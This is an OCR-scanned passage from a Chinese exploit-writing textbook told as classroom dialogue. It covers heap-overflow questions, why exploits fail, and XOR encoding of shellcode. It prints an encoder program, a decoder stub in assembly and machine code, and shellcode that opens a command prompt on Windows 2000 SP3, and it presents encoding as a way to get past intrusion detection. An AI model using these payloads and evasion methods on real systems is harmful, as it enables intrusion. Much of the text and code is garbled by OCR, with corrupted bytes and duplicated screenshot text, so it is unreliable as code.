入 的 研究 方法 ， 都 很 有 意义 。 有 本 书 讲 解 防止 缓冲 区 浴 出 的 方法 时 ， 居 然 建议 不 使 用 数组 ， 
使 用 动态 分 配 这 一 项 。 

О: 为 什么 一 再 要 求 不 要 在 VC 里 调试 和 运行 堆 浴 出 相关 程序 呢 ? 

A : Windows 为 堆 管 理 提供 了 两 套 API， 一 套用 于 正常 管理 分 配 ， 另 一 套用 于 调试 。 使 用 VC 这 
类 ring3 调 试 右 调试 时 ，Windows 会 创建 调试 堆 ， 并 使 用 调试 那 套 范 效 ， 这 样 融和 正音 运行 时 
的 堆 义 理 不 同 。 所 以 一 再 要 求 在 正当 模式 下 运行 相关 程序 。 如 果 要 对 正常 的 堆 分 配 进 行 跟 
蹊 ， 最 好 使 用 ring0 调 试 器 〈 如 SoftICE) 。 

Q : DEBUG 版 本 和 RELEASE 版 本 的 还 有 些 什么 不 同 呢 ? 


A : DEBUG 版 和 RELEASE 版 由 于 编译 选项 不 同 ， 所 以 编译 器 对 它们 的 链接 处 理 和 生成 的 程序 
也 不 同 。DEBUG 有 版 多 了 很 多 东西 ， 比 如 调试 信息 ; RELEASE 版 还 会 进行 优化 。 所 以 调试 版 
本 会 比 发 布 版 大 很 多 。 


О: 我 守 了 一 些 程序 ， 在 DEBUG 版 时 可 以 正常 运行 ; 但 做 成 RELEASE 版 却 报 错 ， 马 上 就 要 
发 布 了 ， 天 啊 1 这 是 怎么 回 事 啊 ? 


А: 不 要 轻易 将 问题 上 归结 为 DEBUG/RELEASE 问 题 ， 先 确保 有 没有 其 他 原因 。 如 果 是 
DEBUG/RELEASE 的 问题 ， 最 大 的 可 能 性 是 变量 初始 化 的 问题 。 在 DEBUG 下 ， 编 译 器 会 目 
动 把 变量 初始 化 ; 而 RELEASE 版 则 不 会 。 另外 ， 预 处 理 的 不 同 、 资 源 文件 的 改变 ， 都 有 可 能 
带 来 问题 。 


О: 堆 洽 出 利用 的 ShellCode 为 什么 会 有 这 么 多 要 求 呢 ?怎么 解决 呢 ? 

A : АРІ 172189 2191285, 10072 6 7, BERE SN EA ER ESRB. 
可 按 如 下 方法 解决 : 

我 们 可 以 使 用 系统 中 另外 存在 的 一 个 挫 蔡 换 挥 PEB 中 系统 黑 认 的 堆 ， 比 如 : 


mov eax,fs:[0x00000018] 《--------- PEB 地 址 
mov eax, [eax+0x30] 


lea eax, [eax+0x18] <-------- 获得 进程 默认 HEAP BASEHHHE?????? 
mov ерх, 0х170000?? 
mov [eax],ebx <----------- 换 成 OX170000 


我 们 也 可 恢复 HEAP FREE LIST 结构， 由 于 被 破坏 的 主要 是 释放 堆 连 表 的 结构 ， 我 们 可 以 取 
出 链表 进行 分 析 ， 恢 复 成 一 个 正常 的 释放 堆 链 表 。 


具体 实现 我 们 将 在 ShellCode 的 高 级 编程 中 讲 到 。 


О: 为 什么 覆盖 Саі [esi+4c] 指 命 的 地 址 就 会 引发 异常 ， 从 而 进入 异常 处 理 点 ?而 为 什么 在 
JPEG 漏 洞 中 可 以 覆盖 0x7830B1DC 久 的 函数 ， 又 不 会 出 错 呢 ? 


А: 这 涉及 到 PE 文件 的 的 分 段 了 。 Call [еѕі+4с] 的 指令 是 在 text 段 ， 就 是 代码 段 中 。text 段 是 
不 可 写 的 ， 所 以 往 它 附近 写 入 时 就 会 出 错 ， 从 而 进入 异常 处 理 ; MJPEG AHA, 2 5504 
数 的 地 址 是 在 data 段 中 ， 而 data 段 是 可 以 写 的 ， 所 以 不 会 引发 异常 。 


Q : 还 有 哪 蔚 扒 洽 出 利用 的 实际 例子 呢 ? 
A: 有 很 多 哦 ， 建 议 再 看 看 RPC 扒 浴 出 漏洞 的 分 析 和 利用 ， 对 增加 扒 的 利用 经 验 有 很 大 帮助 ! 


第 五 革 ShellCode Z JE 25 5 KÁ 


老病 进入 教室 后 说 道 : “时 间 过 得 真 快 呀 ， 不 知 不 觉 已 开课 半期 了 ， 下 面 我 们 小 结 一 下 吧 I! 
"Dl 2? 要 半期 考试 么 ? "大 家 紧张 的 说 。 

“呵呵 1 你 们 说 呢 ? ” 

“哎哟 ， 就 别 考 了 吧 1 我 们 这 么 认真 的 ， 没 有 必要 吧 ? "同学 们 小 心 收 性 的 说 。 

“ 那 这 样 ， 征 求 一 下 大 家 的 意见 。 大 家 举 手 表 决 ， 同 意 半 期 考试 的 请 举 手 !” 

台 下 你 看 我 ， 我 看 你 ， 都 没 人 动 。 然 后 大 家 都 呈 味 的 笑 了 起 来 。 

“好 ， 大 家 一 致 通过。 不 进行 考试 ! "老病 也 笑 了 。 

“ҖИТ!” 

宇 强 对 劳 边 的 小 倩 说 : “有 人 举 手 才 奇怪 呢 !” 

“是 啊 1 ”， 小 倩 笑 得 合 不 拢 嘴 ! 

“了 呵呵， 可 以 不 考试 ， 但 复习 总 结 还 是 要 做 的 。” 老 病 说 ,，“ 这 半期 来 ， 我 们 主要 学 习 过 什么 知 
ine?" 

XR G8 : “第 一 是 Windows 下 堆栈 浴 出 的 利用 。 包 括 堆 栈 浴 出 原理 、 定 位 和 利用 的 方法 。” 


“第 二 是 ShellCode 的 编写 ， 从 易 到 难 的 讲 了 开 DOS 窗 口 、 加 用 户 、 网 络 Shell 等 ShellCode 的 
实际 编写 。 "та UE il if ER. 

“第 三 就 是 Windows 下 堆 浴 出 的 利用 。” 宇 强 补 充 道 。 

小 倩 想 了 想 说 道 : 还 讲 过 一 系列 实际 漏洞 的 利用 编写 | 在 实际 中 利用 最 有 意思 ， 也 提高 得 最 


РЭ с^ 


LS 


5.1 为 什么 要 编码 


宇 强 问 道 : “我 们 现在 有 了 编写 Exploit 的 思路 ， 也 有 了 编写 通用 ShellCode 的 方法 ， 也 能 写 出 一 
些 成 功 的 攻击 程序 。 TEE 按照 漏洞 公告 的 提示 ， 编 写 出 了 攻击 程序 却 没有 效 
果 ， 这 是 怎么 回 事 呢 ? 


“жЩ ! "其 他 人 也 附和 看 。 
“对 ， 这 是 个 很 经 典 的 问题 。 "老病 说 道 , “我 们 首先 来 分 析 一 下 吧 ! ” 


5.1.1 Exploit 失 败 原因 分 析 


“攻击 失败 会 有 很 多 原因 ， 我 们 不 考虑 对 方 打 了 补丁 ， 没 有 漏洞 的 情况 ; 也 不 考虑 网 络 通信 问 
Яй 《如 防火 墙 阻 断 等 ) 。 只 从 编写 Exploit 的 反 术 角度 出 发 ， 分 析 攻 击 程序 会 失败 的 原因 。” 


“我 们 编写 攻击 程序 时 有 三 大 步骤 ， 有 谁 说 说 是 哪 三 步 呢 2?” 老病 问 道 。 


“第 一 、 禾 苹 点 的 定位 ; 第 二 、ShellCode 的 编写 ; 第 三 、 跳 转 到 ShellCode 中 。” 大 家 都 烂熟 于 
胸 ， 一 口 便 答 了 出 来 。 


“很 好 【1 "老病 满 意 的 说 ,， "我 们 融 根 据 这 三 点 来 分 析 攻 击 程序 的 失败 原因 及 造成 原因 吧 |” 
失败 原因 一 、 上 履 兰 氮 偏差 


“这 有 可 能 是 漏洞 公告 上 分 析 的 版 本 和 大 家 实际 攻击 的 版 本 不 同 造 成 的 ; 也 有 些 软 件 由 于 安 竣 
目录 不 同 ， 其 漏洞 的 履 盖 点 位 置 也 不 同 。 还 有 ， 大 家 在 写 Exploit 时 ， 有 可 能 自己 数 错 了 和 窗 功 
的 字符 个 数 ， 这 也 是 初学 者 经 常 犯 的 错误 。” 


«a | 有 时 候 累 了 就 是 容易 数 错 啊 1 "同学 们 说 道 。 


要 解决 这 个 问题 只 有 仔细 些 。" 老 病 说 道 ,“ 认 真 看 浓 楚 公告 的 内 容 ， 数 清楚 覆盖 字符 的 个 
数 。” 


失败 原因 二 、 错 误 的 跳 转 地 址 
“有 些 公布 出 来 的 程序 ， 为 了 避免 滥用 ， 给 的 只 是 针对 某 个 系统 的 跳 转 地 址 ， 其 至 有 的 程序 连 


地 址 都 没有 ， 只 有 0xAAAAAAAA 或 0xXXXXXXXXX 这 样 的 形式 在 覆盖 点 位 置 ， 这 要 我 们 自己 去 
修改 。” 


“前 面 在 讲 堆 浴 出 时 也 说 过 ， 有 时 地 址 是 正确 的 ， 但 所 属 的 dll 没 有 被 加 载 ， 这 样 地 址 所 在 的 地 
方 根 本 没有 指令 ， 也 就 没有 我 们 想 要 的 JMP ESP 或 CALL [esi+0x4c]= ! ” 


“也 有 这 种 情况 ， 有 时 候 红 头 了 ， 我 们 把 0x7FFA4512 在 字符 串 里 直接 写 
成 \xX7F\xFA\x45WX12’”。” 老 病 笑 道 ，“ 但 这 是 错误 的 1 应 该 是 \X12\X45\XFA\X7F'， 这 一 点 大 家 


要 小 心 。” 
小 知识 : 为 什么 0x7FFA4512 要 写成 \X12\x45\xFA\x7F” 


在 Intel 系 列 的 计算 机 下 ， 数 据 的 排列 规则 是 : 高 位 数据 在 高 地 址 ， 低 位 数据 在 低地 址 。7F 是 
最 高 位 数据 ， 所 以 要 放 在 最 高 地 址 一 一 就 是 尺 12\x45\xFA\x7F” 的 最 后 ; 而 12 是 最 低位 数据 ， 
因此 要 放 在 最 前 面 最 低地 址 。 





失败 原因 三 、ShellCode 被 截断 或 改写 
老病 强调 道 ,“ 这 是 最 常见 的 问题 ， 随 时 都 可 能 遇 到 。” 


“ 哦 ?ShellCode 被 谁 改 字 了 呢 ?” 玉 波 问 道 。 


“ 航 目 标 程序 目 己 ! "老病 说 , “任何 目标 程序 都 有 一 些 特殊 字符 不 能 使 用 ， 比 如 IIS 里 面 不 能 
0x20， 如 有 ， 融 会 把 后 面 的 数据 蕉 断 ; 而 Cmail 的 漏洞 不 能 有 大 写字 母 ， 如 有 ， 会 自动 转 为 小 
写字 母 。 这 样 ， 我 们 的 ShellCode 有 可 能 修 截 断 或 蔡 换 ， 当 然 束 完 不 成 攻击 功能 了 。 


判断 Exploit 失 败 原因 的 方法 


“无 论 是 窗 盖 地 址 错误 ， 还 是 ShellCode 被 改变 ， 表 现 出 来 的 现象 都 是 不 能 完成 我 们 想 要 的 功 
能 。” 老 炳 说 道 ，“ 在 这 种 情况 下 ， 我 们 就 需要 知道 究竟 是 履 盖 地 址 错误 了 ， 还 是 ShellCode 被 
ЕТ?" 


' 如 何 判断 呢 ?， 


“要 确定 是 哪 种 原因 ， 有 一 个 比较 菜 乌 的 办 法 : 就 是 在 ShellCode 的 最 前 面 加 上 xEB\xFE’"， 即 
JMP --1 的 机 器 码 。 这 样 构造 一 个 死 循 环 。” 


“Ik ! 我 们 在 堆栈 浴 出 利用 时 ， 将 JMP ESP 改 为 JMP EBX 方 式 ， 用 的 也 是 \xEB\xFE 来 寻找 异 
常 点 的 啊 1” 宇 强 说 道 。 


“EW! 可 不 要 小 具 了 它 ， 在 调试 中 是 很 有 用 的 。"” 老 病 说 道 , “我 们 运行 写 好 的 Exploit 攻 击 程 
ре, 355 ЊЕ, 2:06 Лл\хер\хѓе' іх 56а, 1С +059 Нойісе, 2: 
вижа ава Ах БАЛЕ Y, АЧ ЕВЕ АТА ВЈһе!іСоае, А9176 5:8) 
一 样 ， 这 样 比较 容易 发 现 问题 。” 

“如 果 发 现 没有 陷入 \xeb\xfe' 这 句 死 循环 ， 可 以 肯定 履 盖 的 地 址 是 错 的 ， 需 要 重新 定位 履 盖 
点 ， 或 换 成 通用 的 覆盖 地 址 。” 

“而 进入 了 \xeb\xfe’ 死 循环 ， 那 么 我 们 的 苦力 活 束 来 了 ， 要 一 个 字 节 一 个 字 节 地 同 原 ShellCode 
核对 ， 直 到 发 现 是 哪个 字 节 被 改变 了 。” 

“ 哦 ， 这 个 工作 我 喜欢 上 "古风 乐 呵呵 地 说 ,“ 束 是 核对 内 存 数 据 嘛 1 像 ' 大 家 来 找 差 ' 游 戏 一 样 ， 
我 可 是 高 手 哦 1” 

“好 啊 ， 以 后 像 什么 劈柴 之 类 的 苦力 活 就 交 给 你 啦 1” 玉 波 儿 点 地 说 ，“ 我 可 不 擅长 这 类 工作 。” 
“好 了 ， 我 举 个 亲 映 例子 吧 ，"” 老 评说 道 , “我 最 早 在 测试 Foxmail 漏 洞 时 ， 融 是 用 该 方法 来 发 现 
别人 程序 的 返回 地 址 在 自己 机 器 上 是 无 效 的 ， 浴 出 后 进入 不 了 \xeb\xfe’ 这 句 死 循环 ， 之 后 我 
弦 换 了 一 个 返回 地 址 ， 终 于 可 以 圭 入 \xeb\xfe’* 了 ， 但 还 是 完成 不 了 功能 。 然 后 我 束 对 照 
ShellCode， 发 现 原来 是 ShellCode 中 的 /被 蔡 换 了 。 知 道 问题 束 好 办 了 ， 换 了 一 个 符合 要 求 
的 就 OK 了 。” 


“在 调试 RtlAllocate 堆 洽 出 漏洞 时 ， 我 也 是 这 样 发 现 user32.dll 根 本 没有 加 载 ， 因 此 融 没 有 call 
[esi+0x4c] 的 指令 了 。 所 以 我 提醒 大 家 要 先 LoadLibrary("user32.dll 加 载 user32.dll， 这 样 才能 
利用 成 功 。” 


大 家 听 得 津津 有 味 。 
“有 时 经 验 是 可 遇 不 可 求 的 ， 所 以 这 里 花 点 时 间 讲 ， 和 希望 对 大 家 有 用 。” 


“8, ARRA BB) 1 收 下 了 ! "同学 们 说 道 。 


哈哈， 好 的 | 当 Exploit 失 败 ， 是 因为 ShellCode 里 不 能 有 某 些 字符 时 我 们 就 需要 对 ShellCode 
进行 编码 变换 。” 


5.1.2 ShellCodez; zz BJ ж 
避免 截断 


“我 们 对 ShellCode 编 码 的 第 一 个 用 义 是 避免 ShellCode 里 出 现 \x00'， 从 而 被 截断 。 "老病 说 
3B. 


“这 里 再 说 一 次 ， 字 符 串 是 以 ASCII 码 \x00" 为 结束 标志 的 。 ——— 编译 器 会 自 
动 在 末尾 添加 一 个 \x00'。 比 如 char name[] = 'ww0830' ， 其 实 就 是 char name[] = 
WwW0830\X00 , 


“而 那些 Strcpy、 Strlen 等 字符 串 操作 函数 ， 是 把 \x00’ 作 为 字符 串 的 结束 标志 。 ”老病 说 道 "AD 
果 我 们 的 ShellCode 中 有 "\x00'”， 那 很 显然 ， 目 标 程序 用 strcpy 进 行 数据 拷贝 时 ， 葡 会 在 
ShellCode 中 的 第 一 个 \x00' 处 结束 。 这 样 ， 我 们 的 ShellCode 葡 不 完整 ， 实 现 不 了 我 们 想 要 的 
功能 。” 


“注意 ， char name[] = 'ww0830' ОСТИ лл 'ww0830' 里 的 '0 对 应 
的 ASCIl 码 是 \X60'"， 不 会 被 截断 。 这 是 初学 者 常见 的 问题 。” 


“ 哦 ! 原来 是 这 样 啊 1 ДВТ авом І "В РАЛ 28, 


“所 以 ， 如 果 ShellCode 中 有 ^\x00'"， 那 我 们 肯定 需要 把 它 去 挥 ， 方 法 是 对 ShellCode 进 行 编码 。 
但 编码 不 仅仅 是 这 个 作用 ， 还 有 其 他 功能 。” 


符合 目标 程序 的 要 求 
“我 们 对 ShellCode 编 码 的 第 二 个 用 处 束 是 使 其 符合 目标 程序 对 字符 的 规 范 。 "6 ypt B, 


“比如 ， 攻 击 Foxmail 的 ShellCode 里 不 能 有 和 斜 线 ， 妈 和， RR 
格 ， 即 \x20'。 所 以 对 不 同 的 目标 程序 ， 对 ShellCode 的 要 求 也 不 同 。 我 们 也 需要 通过 编码 来 
避免 。” 


“如 果 说 编码 避免 \x00' 是 ShellCode 的 共性 ， 那 么 避免 目标 程序 的 特殊 字符 要 求 束 是 个 性 了 。 
共性 ， 个 性 ， 那 还 有 特性 吗 ? "小 倩 问 道 。 

“当然 有 啊 ， 我 们 还 可 通过 给 ShellCode 编 码 ， 使 其 突破 IDS 1 ” 

突破 IDS 

我们 对 ShellCode 编 码 的 第 三 个 用 处 ， 融 是 使 其 突破 IDS 的 探测 ! "老病 说 。 

小 知识 : IDS 简 介 


IDS (intrusion detection system) 入 侵 检 测 系 统 是 种 新 闪 的 、 但 仍 在 继续 发 展 中 的 扑 术 。 或 
者 监测 主机 日 志 、 进 程 、 会 话 、 以 及 系统 文件 的 更 变 ， 或 者 监测 主机 /网 络 的 通信 信息 ， 以 发 
现 正在 发 生 的 入 侵 行 为 。 其 工作 流程 大 致 分 为 以 下 几 个 步骤 : 信息 收集 、 信 号 分 析 、 模 式 匹 


配 、 统 计 分 析 、 实 时 记录 、 报 警 或 有 限度 反击 。IDS 的 根本 任务 是 对 入 侵 行为 作出 适当 的 反 
应 ， 这 些 反 应 包 插 详细 日 志 记 录 、 实 时 报警 和 防火 墙 联动 ， 其 至 作 有 限度 的 反击 等 。 


“所 以 ， 我 们 对 ShellCode 编 码 ， 可 以 在 一 定 程度 上 和 钥 开 IDS 的 探测 ， 达 到 攻击 的 效果 。” 





5.2 简单 的 编码 异 或 大 法 


“好 了 ， 说 了 怎么 多 ， 我 们 还 是 来 看 看 编码 的 具体 实现 吧 | ”老病 说 ，“ 有 多 种 方法 可 以 对 
ShellCode 进 行 编码 。 我 们 一 个 个 的 来 探究 吧 ! ” 





“我 会 通过 很 简单 的 讲解 和 实例 来 说 明 思 路 和 方法 | 首先 看 最 简单 、 弟 用 的 方法 一 一 Xxor 大 


法 。” 


5.2.1 原理 异 或 不 变 


“Xxor 是 指 异 或 ， 异 或 的 运算 规则 是 相同 为 0， 不 同 为 1。 因 为 在 二 进 制 条 件 下 ， 每 位 的 取 值 只 有 
0 或 1 两 种 ， 运 算 的 结果 如 表 1。” 








“这 里 只 是 0 或 1， 如 果 是 比较 大 的 数 呢 ? " 吝 风 不 解 的 问 道 。 


“你 的 意思 是 像 10 xor 7 这 样 ， 不 仅 是 二 进 制 条 件 下 的 运算 吧 ? ”老病 说 道 ，“Xor 束 会 先 把 10 和 
7 转化 成 二 进 制 形 式 ， 然 后 按照 上 面 的 规则 对 每 一 位 进行 运算 。” 


“比如 10 xor 7， 融 会 先 转化 成 二 进 制 数 ，10=(1010)B ; 7=(0111)B ; 然后 每 一 位 对 应 异 或 。” 


“从 低位 到 高 位 ， 运 算 依 次 就 是 0 хог 121 ; 1 xor 120 ; О xor 1=1 ; 1 xor 0=1。 如 图 5 一 1。” 


l010—— 10 
ХОГ UA p im J 


1101 — 13 


“所 以 ，10 xor 7 = (1010)В xor (0111)B—(1101)B—13, ”老病 写 出 了 答案 。 

“ 哦 ， 原 来 是 这 样 运算 啊 ! 怎么 用 于 编码 呢 2?” 

“根据 运算 规则 ， 对 于 某 个 值 X， 我 们 选择 任意 密 钥 Key， 都 有 如 下 等 式 成 立 。” 
X xor Key=Z Z xor Key=X ====> X xor Key xor Кеу=Х 

“ 即 ， 一 个 值 对 同一 个 数 异 或 两 次 后 ， 得 到 的 结果 为 原 值 。 "老病 解 释 道 。 
“抽象 啊 . ..." 


“ 举 个 例子 吧 ! 比如 10 xor 7 xor 7 。 刚 才 我 们 已 经 推出 10 xor 7 —13 ; 如 果 再 次 异 或 ， 就 是 13 
xor 7， 又 恢复 了 原来 的 值 10。 计 算 过 程 如 图 5 一 2。” 


1 0 1 0 — 10 
хот 0111 — ? 
1101 —* 13 
XOT Uldl-——* d 
1010 — 10 


We ? "同学 们 问 道 。 


“ 虽 ， 就 是 这 样 的 。" 老 证 回答 道 , “确切 的 说 ， 我 们 选 一 个 key， 编 码 是 将 ShellCode 和 这 个 key 
作 一 次 xor 运 算 ， 得 到 enShellCode ; 解码 ...... 大 家 想 想 ?” 


“ 那 解码 融 是 enShellCode 和 key 再 作 一 次 xor 运 算 ， 又 重新 得 到 ShellCode。 "小 倩 高 兴 的 说 。 


“非常 正确 ， 我 们 来 看 看 如 何 实 现 吧 1” 





异 或 97 


“有 了 思路 ， 算 法 和 实现 融 很 简单 了 。 我 们 把 ShellCode 数 组 里 的 每 一 个 字符 ShellCode[i 与 某 
一 密 钥 Key 作 异 或 ， 就 得 到 了 编码 后 的 enShellCode， 保 存在 enShellCode 数 组 中 。” 


5.2.2 编码 


“在 C 语 言 中 ， 异 或 操作 符 是 人 ， 这 里 我 们 选 Key 为 0Xx97。 如 果 ShellCode 里 面 有 '0x00':， 和 
0x97 异 或 后 ， 束 会 变 为 0xX97， 编 码 后 的 enShellCode 葡 不 会 被 截断 了 。” 


“ 那 如 果 ShellCode 中 有 0x97 呢 ? 岂 不 是 和 Key 异 或 反而 变 为 0， 被 截断 了 ?” 宇 强 想 得 很 远 


“这 个 完全 有 可 能 ! 那 时 我 们 融 只 能 把 Key 改 成 其 他 值 试 试 了 。"” 老 证 说道, “思路 都 是 一 样 的 ， 
我 们 看 看 编码 代码 吧 ! ” 


#include <string.h> 
#include <stdio.h> 
#define KEY 0x97 
unsigned char ShellCode[] = "Nx41Nx00Nx42Nx43"; // 含 有 \x00 的 ShellCode 
int main() 
i А А 
int 1; 
int nLen; 
unsigned char enShellCode[500]; // 编 码 后 的 enShellCode 
nLen = sizeof(ShellCode)-1; // 获 得 ShellCode 的 长 度 
for(i=0; i«nLen; i++) 


enShellCode[i] = ShellCode[i] ^ KEY; // 对 每 一 位 ShellCode 作 xor key 编 码 
printf("NNx%x-",ShellCode[i]); 
printf("NNx%x ",enShellCode[i]); // 打 印 出 效果 


return 0; 


“这 里 我 们 测试 用 的 ShellCode 中 含有 0x00， 但 编码 后 得 到 的 enShellCode 束 不 会 有 了 。 我 们 运 
行 ， 其 效果 如 图 5 一 3。” 
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#include <string.h> 
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unsigned char Shelltode[] = "Mx4d1XxBDAxh2Xxh9g": //7S- 5 xBÜDShellCade 


inl main) 











4 
int i; 
int nLen; x 
unsigned char enShelltode[58H]; / FRI SR IenShelltode 
пеп = sizeof(ShellCode)-1; ЯЛЕ ShellCodeg-- £ 
for(i-H8; і<пі еп: i++} 
4 
emShellCode[i] = $һе11бойе[1] " KEV;//X[5p—[;shellCedejExor кеу 18 
printfF("**Xx$x-",ShellCode[1]); 
printí('"*sXx$x ",enShellCode[i]); ATER B ME 
} 
return ü; 
} 
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“0x41 变 为 d6，0x00 变 为 97 ! 果然 达到 效果 了 ! "同学 们 说 道 。 


“明白 了 编码 ， 大 家 融 来 看 看 解码 吧 ? 





5.2.3 解码 decode 程 序 


“编码 之 后 我 们 得 到 了 enShellCode ; 还 需要 一 段 解码 程序 decode， 让 编码 后 的 enShellCode 
还 原 成 原来 的 ShellCode， 然 后 跳 过 去 执行 。 有 了 decode 和 enShellCode， 我 们 把 decode 放 在 
前 面 ，enShellCode 跟 在 后 面 。 如 图 5 一 4。” 





decode 


解码 代码 编码 后 的 : 


“当然 ，decode 和 enShellCode 里 面 不 能 有 非法 了 字符， 否则 变换 融 失 去 了 意义 。 ”老病 说 
道 , “根据 上 面 的 分 析 ， 我 们 只 需 将 enShellCode 里 面 的 字符 再 异 或 编码 用 的 Key 就 可 以 了 ， 这 
里 还 是 0x97。” 





“decode 实 现 的 汇编 代码 如 下 : ” 


jmp decode end // 为 了 获得 enShellCode 的 地 址 
decode_start: 

рор edx // 得 到 enShellCode 的 开始 位 置 esp -> edx 

dec edx 

xor ecx,ecx 

mov cx,0x200 // 要 解码 的 enShellCode KE, 0x200 5 Е 5% 
decode loop: 

xor byte ptr [еах+есх], 0x97 // 因 为 编码 时 用 的 Key 是 0x97， 所 以 解码 要 一 样 
loop decode loop // 循 环 解码 

jmp decode ok // 解 码 完 毕 后 ， 跳 到 解码 后 的 地 方 执 行 ! 
decode end: 

call decode start 

decode ok: // 后 面 接 编码 后 的 enShellCode 


“得 到 decode 的 机 器 码 后 ， 我 们 把 enShellCode 跟 在 后 面 就 可 以 了 。” 老 羡 指 着 程序 说 。 
“理解 起 来 还 是 有 点 困难 啊 ! "同学 们 面 带 难 色 。 
“ 虽 ， 我 们 一 起 来 过 一 通 吧 1” 


“首先 ， 以 下 代码 段 的 作用 是 定位 enShellCode 的 位 置 。” 


jmp decode end 
decode start: 
pop edx 


decode end: 
call decode start 


“如 何 定位 的 呢 ? "大 家 有 点 奇怪 。 


“Call 的 功能 大 家 还 记得 吧 ? call decode start 会 完成 两 个 功能 : push EIP, JMP 
decode start ， 即 先 保 存 下 一 句 指 使 的 地 址 ， 然 后 跳 到 decode start 处 执行 。” 


“而 call decode start 后 面 紧 跟 enShellCode， 所 以 push EIP 就 会 把 紧 跟 后 面 的 enShellCode 
的 地 址 保存 在 堆栈 中 ， 然 后 跳 到 decode start 处 执行 。” 


ЖЖ ка Һа ko 
“而 在 decode start 处 ， 马 上 рор edx ， 就 会 把 保存 的 EIP (其 实 就 是 enShellCode 的 地 址 ) s 
给 edx， 这 样 edx 就 是 enShellCode 的 地 址 了 。 示 意图 如 图 5 一 5。” 
decode end: 
call decode start deco de start: 


^ 


= push EIP , JMP decode start T 


pop edx 





EDX- 
后 面 的 地 址 


"n ! 原来 这 样 获得 enShellCode 的 地 址 啊 ! "КЕК, 


57 


“这 是 种 动态 定位 地 址 方法 ， 很 多 地 方 都 有 使 用 。"” 老 评说 道 , “我 们 继续 往 下 看 。 


decode_loop: 
xor byte ptr [edx+ecx], 0x97 // 因 为 编码 时 用 的 Key 是 0x97， 所 以 解码 要 一 样 


loop decode loop // 循 环 解码 





“ xor byte ptr [edx+ecx], 0x97 融 是 对 enShellCode 解 码 异 或 0x97 ; 而 loop decode loop 
是 一 个 循环 ， 功 能 是 ecx 减 一 ， 如 果 ecx 不 为 0， 束 跳 到 decode Іоор2 517. 0%, Ж 
可 解码 ecx 这 么 多 个 字 节 ， 这 里 ecx 赋 成 的 是 0x200 (500 多 个 字 节 ) ， 一 般 的 ShellCode 都 应 
12 % f, ” 


“看 来 解码 的 天 键 束 是 这 里 啊 ! ” 


“是 的 ， 最 后 jmp decode ok 是 跳 转 到 复原 的 ShellCode 中 执行 ， 这 样 就 完成 了 decode 的 功 


能 。 
“H, BHAT!” 
"ff, хав ГУЛЕ, RNE Наесодев Л 559210 ! ” 


BEEN 我 来 1 ”古风 和 争先恐后 的 说 ，“ 在 VC 里 面 加 上 asm' 关 键 字 ， 然 后 按 
F10 进 入 调试 状态 ， 选 择 'disassemble' 和 'Code Bytes'， 就 会 出 现汇 编 对 应 的 机 器 码 ， 如 图 5 一 
6。 我 们 把 它们 抄 sairem 






























































































































`. morliegndo Nicrasof:i Visual C4 [brook] [Dizanzomb5ly] 
jim e 
Ene Edit View Дает p-ojeck [pebug Lidl rump utn ртк: Lo |Ё| Х| 
jals ma s ње |2 ce | Pa = wes Шр 
| Globals] || [All global n mm $ main EL 2 E [5x { el «fh 
E SEE EV | b 0 OP OO [6n LED ШЕ) 2 &П 
б: __а5ш ^ 
TE { 
: inp decode end РРА T 383g enShellCtodef Tal 

cy ВОЛО 028 EB 10 1пр decode end { 00101 03а ) 

9I decode start: 

18: pop edx Ji fÉ3S|ensheilCodef]37T28 [7 esp -> edx 

AAAA AZA TA pap edx 

11: dec ейх 

ABLATED ай dec edx 

12: хог есх.есх 

AHADI 2d Ср KOF PCX PC 

43; mov cx, Ux2ü8 fr 了 解码 的 enshelltodell[E, Gxz8üpylz pe 

BDNDTB2E 66 BU BD 02 ro ur cx,ntFzset decode start«ó ( BBuUHT823B) 

15: — decode Loop: 

15: хак hyre pre [erlxy+erx], 097 ff 因为 编码 时 用 的 Key 是 Hx97， 所 出 解码 要 一 样 

00501052 ЕВ 3h ЙА 97 ХОР byte ptr [adx+ecx],97h 

16; loop decode loop ШЕЕ EH 

BüsD4DB36 E? FR lanp decode loop {#8501 d32) 

jm» — decode ok /解码 完毕 后 ， 跳 到 解码 后 的 地 方 执行 | 

HHhH1H3H FH H^ inp йюгпї_ пы [ AAAH ИЛЕ } 

18: decode end: 

19; tall uecuuse slarl 

п0а07 ОЗА EB EB FF FF FF Call decode start {0040 02а) 

20:  decode_ok: S ШЕШӘ еп$һе11Сойе 

21: 

22: ; 

28: return 8; 

ййай1йзг 59 га уп рау paw є 
& Tm | > 
Context: |тайп[] -| | CCECECCE ^ 3 Address: üxügOOOS0 

ЕВХ = /7FFDFBBB : 
Name — aue — | asa 0900000900 fT Тї ?? A 


EI: А Locals h this f “| 


最 后 得 到 decode 的 代码 为 如 下 : "古风 抄 完 后 得 意 的 说 道 。 


ПЁЙЁййй? T7? 77 77 y 


decode[] = 
"NXEBNX10NX5ANXAANX33NXCONX66NXB9NX00Nx02" 
"^NX80NX3ANXOANX97NXE2NXFANXEBNXOBNXE8NXEBNXFFNXFFNXFEF " 


不 错 1 ERG, "我 们 用 一 个 实际 例子 检验 看 看 ! ” 


5.2.4 3: 111—5 sDOS & DEI 


“我 们 还 是 以 Win2000 中 文 版 SP3 下 的 开 DOS 窗 口 的 ShellCode 为 例 。 大 家 应 该 很 熟悉 了 吧 ? 
原来 的 ShellCode 如 下 : ” 


Shellcode[] = 
"\x55\xX8B\xEC\x33\xCO\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" 
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6 
"\x45\xXFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA" 
"\x64\x9f\xE6\x77" //SP3 loadlibrary 地 址 9x77e69f64 
"\x52\x8D\x45\xF4\x50" 
"\xFF\x55\xFO" 
"\x55\xX8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E" 
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4" 
"\x50\xB8" 
"Nxc3NxafNx01Nx78" //SP3 system 的 地 址 0x7801afc3 
"\xFF\xDO" 


Rb BR P | 


“我 们 先 对 ShellCode 进 行 编码 ， 异 或 0x97， 程 序 为 xorCMD.cpp (光盘 有 收录 ) 。 
xorCMD.cpp 还 会 目 动 生 成 规则 格式 ， 执 行 效果 如 图 5 一 7。 
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unsigned char ShellCodef] = — 

"x55 xBBXXEDNXSSXXC OS 

CEC" 

和 

